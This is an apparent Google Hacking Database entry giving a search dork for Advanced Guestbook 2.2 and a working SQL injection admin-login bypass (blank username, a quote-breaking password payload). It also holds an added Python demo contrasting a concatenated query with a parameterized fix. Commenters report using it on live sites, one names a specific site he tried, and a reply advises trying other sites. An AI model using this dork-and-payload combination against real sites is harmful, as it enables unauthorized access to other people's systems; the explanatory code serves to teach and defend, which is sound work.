GHDB

Google Search: intitle:guestbook “advanced guestbook 2.2 powered”

ThrowedOff rates this entry 6 out of 10.
Submitted: 2004-05-12 00:00:00
Added by: ThrowedOff
Hits: 10749
Score: 6

Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. Attacker

From there, hit “Admin” then do the following:

Leave username field blank.
For password, enter this exactly: ’) OR (‘a’ = ‘a

You are now in the Guestbook’s Admin section.

http://www.securityfocus.com/bid/10209
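Why that password value defeats a concatenated login query, and how a bound parameter stops it, as an added example that is not Advanced Guestbook's own code. The table and column names, the `hashpw` SQL function (a stand-in for a database-side hash call) and the query shape are assumptions inferred from the payload closing one quote and one parenthesis.

```python
import hashlib
import hmac
import sqlite3

# The password value from the entry above, typed with straight quotes.
PAYLOAD = "') OR ('a' = 'a"

def hashpw(password):
    # Stand-in for a database-side hash call; unsalted SHA-256 is used only
    # to keep the demo deterministic and is not a recommended password hash.
    return hashlib.sha256(password.encode()).hexdigest()

def make_db():
    """Build a constructed in-memory admin table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("hashpw", 1, hashpw)
    conn.execute("CREATE TABLE auth (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO auth (username, password) VALUES (?, ?)",
                 ("admin", hashpw("correct horse")))
    return conn

def login_concatenated(conn, username, password):
    """Vulnerable shape: form input becomes part of the SQL text."""
    sql = ("SELECT id FROM auth WHERE username = '" + username +
           "' AND password = hashpw('" + password + "')")
    # With PAYLOAD the text ends "... AND password = hashpw('') OR ('a' = 'a')".
    # AND binds tighter than OR, so the WHERE clause is true for every row.
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """Hardened shape: input is bound as data and never parsed as SQL."""
    row = conn.execute("SELECT password FROM auth WHERE username = ?",
                       (username,)).fetchone()
    # The hash comparison happens in application code, in constant time.
    return row is not None and hmac.compare_digest(row[0], hashpw(password))

if __name__ == "__main__":
    db = make_db()
    for name, check in (("concatenated", login_concatenated),
                        ("parameterized", login_parameterized)):
        print(name, "blank user + payload ->", check(db, "", PAYLOAD))
        print(name, "admin + real password ->", check(db, "admin", "correct horse"))
```
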


Comments:

2004-05-27 18:29:44 (Anonymous):
I’m quite amazed that such a simple SQL injection still works on so many sites nowadays. It will work with just about /every/ result that Google pulls up.

2004-05-30 09:53:12 (Fr0zen):
This works perfectly, but I see I was not the first who has already tried it :)

2004-12-25 10:51:00 (vinny):
Yeah, sorry, but I’m a noob and it’s maybe stupid,
but it’s not working for me.
What am I doing wrong?

I search in Google, then for example:
http://benjaminroldan.com/forum/admin.php
then I leave the username empty
and for the password I fill in: ‘) OR (‘a’ = ‘a (between the // in).

and I get an error: Access Denied?
Or SQL Error?

What am I doing wrong?
PS: Sorry for my bad English

2005-08-18 20:43:18 (JTR000):
That one site was secured against it.
Try others.